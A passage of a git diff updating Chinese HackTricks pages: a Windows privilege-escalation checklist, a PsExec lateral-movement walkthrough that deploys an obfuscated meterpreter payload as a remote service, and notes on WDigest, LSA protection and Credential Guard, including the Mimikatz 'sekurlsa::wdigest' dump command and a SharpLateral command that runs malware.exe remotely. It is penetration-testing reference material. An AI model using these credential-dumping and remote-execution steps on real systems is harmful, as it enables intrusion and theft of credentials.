-* [ ] [**PowerShell历史记录**](windows-local-privilege-escalation/#powershell-history)中的密码?
-* [ ] [**Internet设置**](windows-local-privilege-escalation/#internet-settings)中有趣的信息?
+* [ ] 获取 [**系统信息**](windows-local-privilege-escalation/#system-info)
+* [ ] 使用脚本搜索 **内核** [**漏洞**](windows-local-privilege-escalation/#version-exploits)
+* [ ] 使用 **Google 搜索** 内核 **漏洞**
+* [ ] 使用 **searchsploit 搜索** 内核 **漏洞**
+* [ ] [**环境变量**](windows-local-privilege-escalation/#environment) 中的有趣信息?
+* [ ] [**PowerShell 历史**](windows-local-privilege-escalation/#powershell-history) 中的密码?
+* [ ] [**Internet 设置**](windows-local-privilege-escalation/#internet-settings) 中的有趣信息?
* [ ] [**驱动器**](windows-local-privilege-escalation/#drives)?
-* [ ] [**WSUS漏洞**](windows-local-privilege-escalation/#wsus)?
+* [ ] [**WSUS 漏洞**](windows-local-privilege-escalation/#wsus)?
* [ ] [**AlwaysInstallElevated**](windows-local-privilege-escalation/#alwaysinstallelevated)?
-### [日志/AV枚举](windows-local-privilege-escalation/#enumeration)
+### [日志/AV 枚举](windows-local-privilege-escalation/#enumeration)
-* [ ] 检查[**审计**](windows-local-privilege-escalation/#audit-settings)和[**WEF**](windows-local-privilege-escalation/#wef)设置
-* [ ] 检查[**LAPS**](windows-local-privilege-escalation/#laps)
-* [ ] 检查是否激活了[**WDigest**](windows-local-privilege-escalation/#wdigest)
-* [ ] [**LSA保护**](windows-local-privilege-escalation/#lsa-protection)?
+* [ ] 检查 [**审计**](windows-local-privilege-escalation/#audit-settings) 和 [**WEF**](windows-local-privilege-escalation/#wef) 设置
+* [ ] 检查 [**LAPS**](windows-local-privilege-escalation/#laps)
+* [ ] 检查 [**WDigest**](windows-local-privilege-escalation/#wdigest) 是否处于活动状态
+* [ ] [**LSA 保护**](windows-local-privilege-escalation/#lsa-protection)?
* [ ] [**凭据保护**](windows-local-privilege-escalation/#credentials-guard)[?](windows-local-privilege-escalation/#cached-credentials)
* [ ] [**缓存凭据**](windows-local-privilege-escalation/#cached-credentials)?
-* [ ] 检查是否有任何[**AV**](https://github.com/carlospolop/hacktricks/blob/cn/windows-hardening/windows-av-bypass/README.md)
-* [ ] [**AppLocker策略**](https://github.com/carlospolop/hacktricks/blob/cn/windows-hardening/authentication-credentials-uac-and-efs/README.md#applocker-policy)?
-* [ ] [**UAC**](https://github.com/carlospolop/hacktricks/blob/cn/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control/README.md)
+* [ ] 检查是否有任何 [**AV**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/windows-av-bypass/README.md)
+* [ ] [**AppLocker 策略**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/README.md#applocker-policy)?
+* [ ] [**UAC**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control/README.md)
* [ ] [**用户权限**](windows-local-privilege-escalation/#users-and-groups)
-* [ ] 检查[**当前**用户**权限**](windows-local-privilege-escalation/#users-and-groups)
-* [ ] 您是否是任何特权组的[**成员**](windows-local-privilege-escalation/#privileged-groups)?
-* [ ] 检查是否启用了以下任何令牌]\(windows-local-privilege-escalation/#token-manipulation):**SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
+* [ ] 检查 [**当前** 用户 **权限**](windows-local-privilege-escalation/#users-and-groups)
+* [ ] 你是 [**任何特权组的成员**](windows-local-privilege-escalation/#privileged-groups)吗?
+* [ ] 检查你是否启用了 [这些令牌](windows-local-privilege-escalation/#token-manipulation):**SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
* [ ] [**用户会话**](windows-local-privilege-escalation/#logged-users-sessions)?
-* [ ] 检查[**用户主目录**](windows-local-privilege-escalation/#home-folders)(访问?)
-* [ ] 检查[**密码策略**](windows-local-privilege-escalation/#password-policy)
-* [ ] [**剪贴板**](windows-local-privilege-escalation/#get-the-content-of-the-clipboard)中有什么?
+* [ ] 检查 [**用户主目录**](windows-local-privilege-escalation/#home-folders)(访问?)
+* [ ] 检查 [**密码策略**](windows-local-privilege-escalation/#password-policy)
+* [ ] [**剪贴板**](windows-local-privilege-escalation/#get-the-content-of-the-clipboard) 中有什么?
### [网络](windows-local-privilege-escalation/#network)
-* 检查**当前**[**网络** **信息**](windows-local-privilege-escalation/#network)
-* 检查**隐藏的本地服务**是否受限于外部
+* [ ] 检查 **当前** [**网络** **信息**](windows-local-privilege-escalation/#network)
+* [ ] 检查 **隐藏的本地服务** 是否限制外部访问
-### [运行进程](windows-local-privilege-escalation/#running-processes)
+### [运行中的进程](windows-local-privilege-escalation/#running-processes)
-* 进程二进制文件和文件夹权限[**文件和文件夹权限**](windows-local-privilege-escalation/#file-and-folder-permissions)
-* [**内存密码挖掘**](windows-local-privilege-escalation/#memory-password-mining)
-* [**不安全的GUI应用程序**](windows-local-privilege-escalation/#insecure-gui-apps)
-* 通过`ProcDump.exe`窃取**有趣进程**的凭据?(firefox,chrome等...)
+* [ ] 进程二进制文件 [**文件和文件夹权限**](windows-local-privilege-escalation/#file-and-folder-permissions)
+* [ ] [**内存密码挖掘**](windows-local-privilege-escalation/#memory-password-mining)
+* [ ] [**不安全的 GUI 应用程序**](windows-local-privilege-escalation/#insecure-gui-apps)
+* [ ] 通过 `ProcDump.exe` 偷取 **有趣进程** 的凭据?(firefox, chrome 等 ...)
### [服务](windows-local-privilege-escalation/#services)
-* [您能否**修改任何服务**?](windows-local-privilege-escalation/#permissions)
-* [您能否**修改**任何**服务**执行的**二进制文件**?](windows-local-privilege-escalation/#modify-service-binary-path)
-* [您能否**修改**任何**服务**的**注册表**?](windows-local-privilege-escalation/#services-registry-modify-permissions)
-* 您能否利用任何**未加引号的服务**二进制**路径**?]\(windows-local-privilege-escalation/#unquoted-service-paths)
+* [ ] [你能 **修改任何服务** 吗?](windows-local-privilege-escalation/#permissions)
+* [ ] [你能 **修改** 任何 **服务** 执行的 **二进制文件** 吗?](windows-local-privilege-escalation/#modify-service-binary-path)
+* [ ] [你能 **修改** 任何 **服务** 的 **注册表** 吗?](windows-local-privilege-escalation/#services-registry-modify-permissions)
+* [ ] [你能利用任何 **未加引号的服务** 二进制 **路径** 吗?](windows-local-privilege-escalation/#unquoted-service-paths)
### [**应用程序**](windows-local-privilege-escalation/#applications)
-* **写入**[**已安装应用程序**](windows-local-privilege-escalation/#write-permissions)的权限
-* [**启动应用程序**](windows-local-privilege-escalation/#run-at-startup)
-* **易受攻击的**[**驱动程序**](windows-local-privilege-escalation/#drivers)
+* [ ] **写入** [**已安装应用程序的权限**](windows-local-privilege-escalation/#write-permissions)
+* [ ] [**启动应用程序**](windows-local-privilege-escalation/#run-at-startup)
+* [ ] **易受攻击的** [**驱动程序**](windows-local-privilege-escalation/#drivers)
-### [DLL劫持](windows-local-privilege-escalation/#path-dll-hijacking)
+### [DLL 劫持](windows-local-privilege-escalation/#path-dll-hijacking)
-* [ ] 你可以**在PATH中的任何文件夹中写入**吗?
-* [ ] 是否有任何已知的服务二进制文件**尝试加载任何不存在的DLL**?
-* [ ] 你可以**写入**任何**二进制文件夹**吗?
+* [ ] 你能 **在 PATH 中的任何文件夹中写入** 吗?
+* [ ] 是否有任何已知的服务二进制文件 **尝试加载任何不存在的 DLL**?
+* [ ] 你能 **在任何二进制文件夹中写入** 吗?
### [网络](windows-local-privilege-escalation/#network)
-* [ ] 枚举网络(共享、接口、路由、邻居,...)
-* [ ] 特别关注监听在本地主机(127.0.0.1)上的网络服务
+* [ ] 枚举网络(共享、接口、路由、邻居等...)
+* [ ] 特别关注在本地主机(127.0.0.1)上监听的网络服务
-### [Windows凭证](windows-local-privilege-escalation/#windows-credentials)
+### [Windows 凭据](windows-local-privilege-escalation/#windows-credentials)
-* [ ] [**Winlogon**](windows-local-privilege-escalation/#winlogon-credentials)凭证
-* [ ] 你可以使用的[**Windows Vault**](windows-local-privilege-escalation/#credentials-manager-windows-vault)凭证?
-* [ ] 有趣的[**DPAPI凭证**](windows-local-privilege-escalation/#dpapi)?
-* [ ] 已保存的[**Wifi网络**](windows-local-privilege-escalation/#wifi)密码?
-* [ ] 已保存的[**RDP连接**](windows-local-privilege-escalation/#saved-rdp-connections)中的有趣信息?
-* [ ] [**最近运行的命令**](windows-local-privilege-escalation/#recently-run-commands)中的密码?
-* [ ] [**远程桌面凭证管理器**](windows-local-privilege-escalation/#remote-desktop-credential-manager)密码?
-* [ ] [**AppCmd.exe**是否存在](windows-local-privilege-escalation/#appcmd-exe)?凭证?
-* [ ] [**SCClient.exe**](windows-local-privilege-escalation/#scclient-sccm)?DLL侧加载?
+* [ ] [**Winlogon**](windows-local-privilege-escalation/#winlogon-credentials) 凭据
+* [ ] [**Windows Vault**](windows-local-privilege-escalation/#credentials-manager-windows-vault) 凭据你可以使用?
+* [ ] 有趣的 [**DPAPI 凭据**](windows-local-privilege-escalation/#dpapi)?
+* [ ] 保存的 [**Wifi 网络**](windows-local-privilege-escalation/#wifi) 密码?
+* [ ] [**保存的 RDP 连接**](windows-local-privilege-escalation/#saved-rdp-connections) 中的有趣信息?
+* [ ] [**最近运行的命令**](windows-local-privilege-escalation/#recently-run-commands) 中的密码?
+* [ ] [**远程桌面凭据管理器**](windows-local-privilege-escalation/#remote-desktop-credential-manager) 密码?
+* [ ] [**AppCmd.exe** 是否存在](windows-local-privilege-escalation/#appcmd-exe)?凭据?
+* [ ] [**SCClient.exe**](windows-local-privilege-escalation/#scclient-sccm)?DLL 侧加载?
-### [文件和注册表(凭证)](windows-local-privilege-escalation/#files-and-registry-credentials)
+### [文件和注册表(凭据)](windows-local-privilege-escalation/#files-and-registry-credentials)
-* [ ] **Putty:** [**凭证**](windows-local-privilege-escalation/#putty-creds) **和** [**SSH主机密钥**](windows-local-privilege-escalation/#putty-ssh-host-keys)
-* [ ] 注册表中的[**SSH密钥**](windows-local-privilege-escalation/#ssh-keys-in-registry)?
-* [ ] [**无人值守文件**](windows-local-privilege-escalation/#unattended-files)中的密码?
-* [ ] 任何[**SAM和SYSTEM**](windows-local-privilege-escalation/#sam-and-system-backups)备份?
-* [ ] [**云凭证**](windows-local-privilege-escalation/#cloud-credentials)?
-* [ ] [**McAfee SiteList.xml**](windows-local-privilege-escalation/#mcafee-sitelist.xml)文件?
-* [ ] [**缓存的GPP密码**](windows-local-privilege-escalation/#cached-gpp-pasword)?
-* [ ] [**IIS Web配置文件**](windows-local-privilege-escalation/#iis-web-config)中的密码?
-* [ ] [**Web日志**](windows-local-privilege-escalation/#logs)中的有趣信息?
-* [ ] 你想要向用户[**请求凭证**](windows-local-privilege-escalation/#ask-for-credentials)吗?
-* [ ] 回收站中的[**有凭证的文件**](windows-local-privilege-escalation/#credentials-in-the-recyclebin)?
-* [ ] 其他包含凭证的[**注册表**](windows-local-privilege-escalation/#inside-the-registry)?
-* [ ] 浏览器数据中(数据库、历史记录、书签,...)的[**通用密码搜索**](windows-local-privilege-escalation/#browsers-history)?
-* [ ] 在文件和注册表中进行[**通用密码搜索**](windows-local-privilege-escalation/#generic-password-search-in-files-and-registry)?
-* [ ] 自动搜索密码的[**工具**](windows-local-privilege-escalation/#tools-that-search-for-passwords)?
+* [ ] **Putty:** [**凭据**](windows-local-privilege-escalation/#putty-creds) **和** [**SSH 主机密钥**](windows-local-privilege-escalation/#putty-ssh-host-keys)
+* [ ] [**注册表中的 SSH 密钥**](windows-local-privilege-escalation/#ssh-keys-in-registry)?
+* [ ] [**无人值守文件**](windows-local-privilege-escalation/#unattended-files) 中的密码?
+* [ ] 任何 [**SAM & SYSTEM**](windows-local-privilege-escalation/#sam-and-system-backups) 备份?
+* [ ] [**云凭据**](windows-local-privilege-escalation/#cloud-credentials)?
+* [ ] [**McAfee SiteList.xml**](windows-local-privilege-escalation/#mcafee-sitelist.xml) 文件?
+* [ ] [**缓存的 GPP 密码**](windows-local-privilege-escalation/#cached-gpp-pasword)?
+* [ ] [**IIS Web 配置文件**](windows-local-privilege-escalation/#iis-web-config) 中的密码?
+* [ ] [**Web 日志**](windows-local-privilege-escalation/#logs) 中的有趣信息?
+* [ ] 你想要 [**向用户请求凭据**](windows-local-privilege-escalation/#ask-for-credentials) 吗?
+* [ ] [**回收站中的有趣文件**](windows-local-privilege-escalation/#credentials-in-the-recyclebin)?
+* [ ] 其他 [**包含凭据的注册表**](windows-local-privilege-escalation/#inside-the-registry)?
+* [ ] [**浏览器数据**](windows-local-privilege-escalation/#browsers-history) 中(数据库、历史记录、书签等)?
+* [ ] [**通用密码搜索**](windows-local-privilege-escalation/#generic-password-search-in-files-and-registry) 在文件和注册表中
+* [ ] [**工具**](windows-local-privilege-escalation/#tools-that-search-for-passwords) 自动搜索密码
-### [泄漏的处理程序](windows-local-privilege-escalation/#leaked-handlers)
+### [泄露的处理程序](windows-local-privilege-escalation/#leaked-handlers)
-* [ ] 你可以访问任何由管理员运行的进程的处理程序吗?
+* [ ] 你是否可以访问由管理员运行的任何进程的处理程序?
### [管道客户端冒充](windows-local-privilege-escalation/#named-pipe-client-impersonation)
-* [ ] 检查是否可以滥用它
+* [ ] 检查你是否可以利用它
-**Try Hard Security Group**
+**努力安全小组**
{% embed url="https://discord.gg/tryhardsecurity" %}
+{% hint style="success" %}
+学习和实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习和实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
+支持 HackTricks
-支持HackTricks的其他方式:
-
-* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
-* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
-* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live) 上**关注**我们。
-* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %}
diff --git a/windows-hardening/lateral-movement/psexec-and-winexec.md b/windows-hardening/lateral-movement/psexec-and-winexec.md
index 8ab708af0..306d4f737 100644
--- a/windows-hardening/lateral-movement/psexec-and-winexec.md
+++ b/windows-hardening/lateral-movement/psexec-and-winexec.md
@@ -1,47 +1,48 @@
# PsExec/Winexec/ScExec
+{% hint style="success" %}
+学习和实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习和实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)!
+支持 HackTricks
-支持HackTricks的其他方式:
-
-* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
-* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
-* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
-* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
+{% endhint %}
## 它们是如何工作的
-以下是服务二进制文件如何被操纵以通过SMB在目标机器上实现远程执行的步骤概述:
+该过程在以下步骤中概述,说明如何操纵服务二进制文件以通过 SMB 在目标机器上实现远程执行:
-1. 通过SMB将服务二进制文件**复制到ADMIN$共享**。
-2. 通过指向二进制文件**在远程机器上创建服务**。
-3. **远程启动服务**。
-4. 退出时,**停止服务并删除二进制文件**。
+1. **通过 SMB 复制服务二进制文件到 ADMIN$ 共享**。
+2. **在远程机器上创建服务**,指向该二进制文件。
+3. 服务被 **远程启动**。
+4. 退出时,服务被 **停止,二进制文件被删除**。
-### **手动执行PsExec的过程**
+### **手动执行 PsExec 的过程**
-假设存在一个可执行有效载荷(使用msfvenom创建,并使用Veil进行混淆以规避杀毒软件检测),名为'met8888.exe',代表一个meterpreter reverse\_http有效载荷,采取以下步骤:
+假设有一个可执行有效载荷(使用 msfvenom 创建并使用 Veil 混淆以规避防病毒检测),名为 'met8888.exe',代表一个 meterpreter reverse_http 有效载荷,采取以下步骤:
-* **复制二进制文件**:从命令提示符将可执行文件复制到ADMIN$共享,尽管它可以放置在文件系统的任何位置以保持隐藏。
-* **创建服务**:利用Windows `sc`命令,允许远程查询、创建和删除Windows服务,创建一个名为"meterpreter"的服务,指向上传的二进制文件。
-* **启动服务**:最后一步涉及启动服务,这可能会导致"超时"错误,因为二进制文件不是真正的服务二进制文件,无法返回预期的响应代码。这个错误并不重要,因为主要目标是执行二进制文件。
+* **复制二进制文件**:可执行文件从命令提示符复制到 ADMIN$ 共享,尽管它可以放置在文件系统的任何位置以保持隐蔽。
+* **创建服务**:利用 Windows `sc` 命令,该命令允许远程查询、创建和删除 Windows 服务,创建一个名为 "meterpreter" 的服务,指向上传的二进制文件。
+* **启动服务**:最后一步是启动服务,这可能会导致 "超时" 错误,因为该二进制文件不是一个真正的服务二进制文件,未能返回预期的响应代码。此错误无关紧要,因为主要目标是执行该二进制文件。
-观察Metasploit监听器将显示会话已成功启动。
+观察 Metasploit 监听器将显示会话已成功启动。
-[了解更多关于`sc`命令的信息](https://technet.microsoft.com/en-us/library/bb490995.aspx)。
+[了解更多关于 `sc` 命令的信息](https://technet.microsoft.com/en-us/library/bb490995.aspx)。
-在这里找到更详细的步骤:[https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
+在此查找更详细的步骤:[https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
-**您还可以使用Windows Sysinternals二进制文件PsExec.exe:**
+**您还可以使用 Windows Sysinternals 二进制文件 PsExec.exe:**
.png>)
-您也可以使用[**SharpLateral**](https://github.com/mertdas/SharpLateral):
+您还可以使用 [**SharpLateral**](https://github.com/mertdas/SharpLateral):
{% code overflow="wrap" %}
```
@@ -49,16 +50,17 @@ SharpLateral.exe redexec HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe
```
{% endcode %}
+{% hint style="success" %}
+学习与实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习与实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)!
+支持 HackTricks
-支持HackTricks的其他方式:
-
-* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
-* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
-* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
-* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
+{% endhint %}
diff --git a/windows-hardening/stealing-credentials/credentials-protections.md b/windows-hardening/stealing-credentials/credentials-protections.md
index 07dffb147..186f0811e 100644
--- a/windows-hardening/stealing-credentials/credentials-protections.md
+++ b/windows-hardening/stealing-credentials/credentials-protections.md
@@ -1,128 +1,134 @@
# Windows Credentials Protections
-## 凭证保护
+## Credentials Protections
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
+Support HackTricks
-支持HackTricks的其他方式:
-
-* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
-* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
-* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
-* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+{% endhint %}
## WDigest
-[WDigest](https://technet.microsoft.com/pt-pt/library/cc778868\(v=ws.10\).aspx?f=255\&MSPPError=-2147217396)协议是在Windows XP中引入的,旨在通过HTTP协议进行身份验证,**在Windows XP到Windows 8.0和Windows Server 2003到Windows Server 2012上默认启用**。这个默认设置导致**LSASS中存储明文密码**。攻击者可以使用Mimikatz来**提取这些凭证**,执行以下操作:
-
+[WDigest](https://technet.microsoft.com/pt-pt/library/cc778868\(v=ws.10\).aspx?f=255\&MSPPError=-2147217396) 协议于 Windows XP 中引入,旨在通过 HTTP 协议进行身份验证,并且在 Windows XP 到 Windows 8.0 及 Windows Server 2003 到 Windows Server 2012 中**默认启用**。此默认设置导致**在 LSASS 中以明文存储密码**(本地安全授权子系统服务)。攻击者可以使用 Mimikatz 通过执行以下命令来**提取这些凭据**:
```bash
sekurlsa::wdigest
```
-
-要**关闭或打开此功能**,必须将\_HKEY\_LOCAL\_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest\_中的\_**UseLogonCredential**_和_**Negotiate**\_注册表键设置为"1"。如果这些键**不存在或设置为"0"**,则WDigest被**禁用**:
-
+要**切换此功能的开关**,必须将_HKEY\_LOCAL\_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest_中的_**UseLogonCredential**_和_**Negotiate**_注册表项设置为“1”。如果这些键**缺失或设置为“0”**,则WDigest将**被禁用**:
```bash
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
```
+## LSA 保护
-## 凭证保护
-
-从 **Windows 8.1** 开始,微软增强了对 LSA 的安全性,以**阻止不受信任进程的未经授权的内存读取或代码注入**。这种增强阻碍了像 `mimikatz.exe sekurlsa:logonpasswords` 这样的命令的典型功能。要**启用这种增强保护**,需要将 _**HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\LSA**_ 中的 _**RunAsPPL**_ 值调整为 1:
-
+从 **Windows 8.1** 开始,微软增强了 LSA 的安全性,以 **阻止不受信任进程的未经授权的内存读取或代码注入**。这一增强阻碍了像 `mimikatz.exe sekurlsa:logonpasswords` 这样的命令的典型功能。要 **启用这种增强保护**,应将 _**RunAsPPL**_ 值在 _**HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\LSA**_ 中调整为 1:
```
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL
```
-
-### 绕过
+### Bypass
可以使用 Mimikatz 驱动程序 mimidrv.sys 绕过此保护:
-## 凭据保护
+## Credential Guard
-**凭据保护** 是 **Windows 10(企业和教育版本)** 专属的功能,通过 **虚拟安全模式(VSM)** 和 **基于虚拟化的安全(VBS)** 增强了机器凭据的安全性。它利用 CPU 虚拟化扩展来将关键进程隔离在受保护的内存空间中,远离主操作系统的访问范围。这种隔离确保即使内核也无法访问 VSM 中的内存,有效保护凭据免受 **传递哈希** 等攻击。**本地安全机构(LSA)** 在这个安全环境中作为一个信任模块运行,而主操作系统中的 **LSASS** 进程仅作为与 VSM 的 LSA 进行通信的工具。
+**Credential Guard** 是 **Windows 10(企业版和教育版)** 独有的功能,通过 **虚拟安全模式(VSM)** 和 **基于虚拟化的安全性(VBS)** 增强机器凭据的安全性。它利用 CPU 虚拟化扩展将关键进程隔离在受保护的内存空间中,远离主操作系统的访问。这种隔离确保即使是内核也无法访问 VSM 中的内存,有效保护凭据免受 **pass-the-hash** 等攻击。**本地安全机构(LSA)** 在这个安全环境中作为信任小程序运行,而主操作系统中的 **LSASS** 进程仅充当与 VSM 的 LSA 的通信者。
-默认情况下,**凭据保护** 处于非活动状态,需要在组织内手动激活。这对增强安全性非常关键,可以防止像 **Mimikatz** 这样的工具提取凭据。然而,仍然可以通过添加自定义 **安全支持提供程序(SSP)** 来利用漏洞,在登录尝试期间捕获明文凭据。
-
-要验证 **凭据保护** 的激活状态,可以检查注册表键 _**HKLM\System\CurrentControlSet\Control\LSA**_ 下的 _**LsaCfgFlags**_。数值为 "**1**" 表示激活并带有 **UEFI 锁**,"**2**" 表示未锁定,"**0**" 表示未启用。尽管这种注册表检查是一个强有力的指标,但并非启用凭据保护的唯一步骤。在线提供了详细指南和用于启用此功能的 PowerShell 脚本。
+默认情况下,**Credential Guard** 并未激活,需要在组织内手动激活。它对于增强抵御像 **Mimikatz** 这样的工具的安全性至关重要,这些工具在提取凭据时受到限制。然而,仍然可以通过添加自定义 **安全支持提供程序(SSP)** 来利用漏洞,在登录尝试期间捕获明文凭据。
+要验证 **Credential Guard** 的激活状态,可以检查注册表项 _**LsaCfgFlags**_,位于 _**HKLM\System\CurrentControlSet\Control\LSA**_。值为 "**1**" 表示激活并带有 **UEFI 锁**,"**2**" 表示没有锁,"**0**" 表示未启用。此注册表检查虽然是一个强有力的指示,但并不是启用 Credential Guard 的唯一步骤。有关启用此功能的详细指导和 PowerShell 脚本可在线获取。
```powershell
reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags
```
+为了全面了解和启用 **Credential Guard** 在 Windows 10 中的说明,以及在兼容的 **Windows 11 Enterprise 和 Education (版本 22H2)** 系统中自动激活的说明,请访问 [Microsoft's documentation](https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage)。
-要全面了解并了解在Windows 10中启用**凭据保护**以及在\*\*Windows 11企业和教育版(版本22H2)\*\*兼容系统中自动激活的详细说明,请访问[Microsoft的文档](https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage)。
-
-有关为凭据捕获实施自定义SSP的详细信息,请参阅[此指南](../active-directory-methodology/custom-ssp.md)。
